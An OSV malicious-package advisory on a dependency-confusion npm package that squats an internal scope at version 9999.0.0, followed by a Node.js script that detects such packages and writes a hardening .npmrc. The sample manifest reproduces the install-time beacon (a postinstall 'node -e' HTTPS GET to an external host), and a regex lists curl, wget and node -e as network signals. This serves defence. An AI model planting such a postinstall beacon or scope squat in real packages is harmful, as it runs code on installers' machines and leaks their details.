@businessapp-microsites/apis @9999.0.1
Vulnerability report · Last retrieved from osv.dev June 30, 2026 at 11:01 PM UTC
OSV ID
MAL-2026-6696
Ecosystem
npm
Summary
Package squats the @businessapp-microsites npm scope and is published at version 9999.0.0 so that it outranks any internal version during dependency resolution. Its package.json declares a postinstall script that runs node -e to issue an HTTPS GET to poc-trustpilot-npm-1782770591.testingboxes.com with a unique per-package token in the URL path. On any npm install that resolves this scope from the public registry, the installing machine makes an outbound callback that confirms code execution and discloses the installer's source IP, and the fact that the install happened, to a third-party host. An unregistered-scope squat, an artificially high 9999.0.0 version number, and an install-time beacon to an external host together form the canonical dependency-confusion attack pattern; the researcher framing in the package metadata does not change the runtime behavior on any machine that installs it.
Source: amazon-inspector (8e03d8a4119cd5d1c143adb4fcdab1625747178082a6d56717e758b513aec4f7)
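The three signals the record combines (an internal scope served by the public registry, an implausibly high version, and a lifecycle script that reaches the network) can be checked mechanically before `npm install` runs. The Node.js script below is an added example written for this page; it is not the OSV record's or any scanner's code. The internal scope list, the internal registry URL `https://npm.internal.example/`, the 9000 version threshold, and the sample manifest and lockfile fragment are all constructed for illustration; the postinstall body is modelled on the behaviour the summary describes, with `TOKEN` standing in for the per-package token.

```javascript
'use strict';

// Scopes that only an internal registry should serve. Assumption for this
// example; the real list comes from the organization's registry configuration.
const INTERNAL_SCOPES = ['@businessapp-microsites'];
const PUBLIC_REGISTRY = 'https://registry.npmjs.org/';
// Hypothetical internal registry URL used in the generated .npmrc.
const INTERNAL_REGISTRY = 'https://npm.internal.example/';

// Lifecycle hooks npm runs automatically during install.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];
// Crude signal for network activity inside a lifecycle script.
const NETWORK_RE = /(\bnode\s+-e\b|\bcurl\b|\bwget\b|https?:\/\/)/i;

function scopeOf(name) {
  return name.startsWith('@') ? name.split('/')[0] : null;
}

// Check one package.json object (plus, optionally, the URL the lockfile says it
// was resolved from) for the three signals the advisory combines.
function checkManifest(pkg, resolvedUrl) {
  const findings = [];
  const major = parseInt(String(pkg.version || '0').split('.')[0], 10);
  if (Number.isFinite(major) && major >= 9000) {
    findings.push(`version ${pkg.version}: implausibly high major version, used to outrank any internal release`);
  }
  const scope = scopeOf(pkg.name);
  if (scope && INTERNAL_SCOPES.includes(scope) && resolvedUrl && resolvedUrl.startsWith(PUBLIC_REGISTRY)) {
    findings.push(`${pkg.name} resolved from the public registry although ${scope} is an internal scope`);
  }
  const scripts = pkg.scripts || {};
  for (const hook of LIFECYCLE_HOOKS) {
    if (scripts[hook] && NETWORK_RE.test(scripts[hook])) {
      findings.push(`${hook} script performs network access: ${scripts[hook]}`);
    }
  }
  return findings;
}

// Walk a package-lock.json (lockfileVersion 2 or 3) and flag internal-scope
// entries resolved from the public registry, plus any entry npm has marked as
// carrying an install-time script.
function scanLockfile(lock) {
  const findings = [];
  for (const [path, entry] of Object.entries(lock.packages || {})) {
    if (path === '') continue; // root project entry
    const name = entry.name || path.slice(path.lastIndexOf('node_modules/') + 'node_modules/'.length);
    const scope = scopeOf(name);
    if (scope && INTERNAL_SCOPES.includes(scope) && (entry.resolved || '').startsWith(PUBLIC_REGISTRY)) {
      findings.push(`${name}@${entry.version}: internal scope served by ${entry.resolved}`);
    }
    if (entry.hasInstallScript) {
      findings.push(`${name}@${entry.version}: has an install-time script`);
    }
  }
  return findings;
}

// .npmrc that pins each internal scope to the internal registry and disables
// lifecycle scripts, removing both halves of the attack.
function hardeningNpmrc(scopes, internalRegistry) {
  return scopes.map((s) => `${s}:registry=${internalRegistry}`).concat('ignore-scripts=true').join('\n') + '\n';
}

// Constructed sample manifest modelled on the behaviour the record describes;
// the script body and the TOKEN path segment are illustrative.
const SAMPLE_MANIFEST = {
  name: '@businessapp-microsites/apis',
  version: '9999.0.0',
  scripts: {
    postinstall: 'node -e "require(\'https\').get(\'https://poc-trustpilot-npm-1782770591.testingboxes.com/TOKEN\')"',
  },
};

// Constructed lockfile fragment showing the internal scope resolved from npmjs.org.
const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    '': { name: 'internal-app', version: '1.0.0' },
    'node_modules/@businessapp-microsites/apis': {
      version: '9999.0.0',
      resolved: 'https://registry.npmjs.org/@businessapp-microsites/apis/-/apis-9999.0.0.tgz',
      hasInstallScript: true,
    },
    'node_modules/left-pad': {
      version: '1.3.0',
      resolved: 'https://registry.npmjs.org/left-pad/-/left-pad-1.3.0.tgz',
    },
  },
};

console.log(checkManifest(SAMPLE_MANIFEST, SAMPLE_LOCK.packages['node_modules/@businessapp-microsites/apis'].resolved));
console.log(scanLockfile(SAMPLE_LOCK));
console.log(hardeningNpmrc(INTERNAL_SCOPES, INTERNAL_REGISTRY));
```

The `.npmrc` produced by `hardeningNpmrc` is the durable fix: once `@businessapp-microsites:registry=` points at the internal registry, npm never asks npmjs.org for that scope, whatever version is published there. `ignore-scripts=true` stops the postinstall beacon but also stops legitimate build hooks, so projects that depend on native modules usually pair it with an explicit post-install step for the few packages that need one. Registering the scope on the public registry, so it cannot be squatted at all, is the complementary control the record's "unregistered-scope squat" points at.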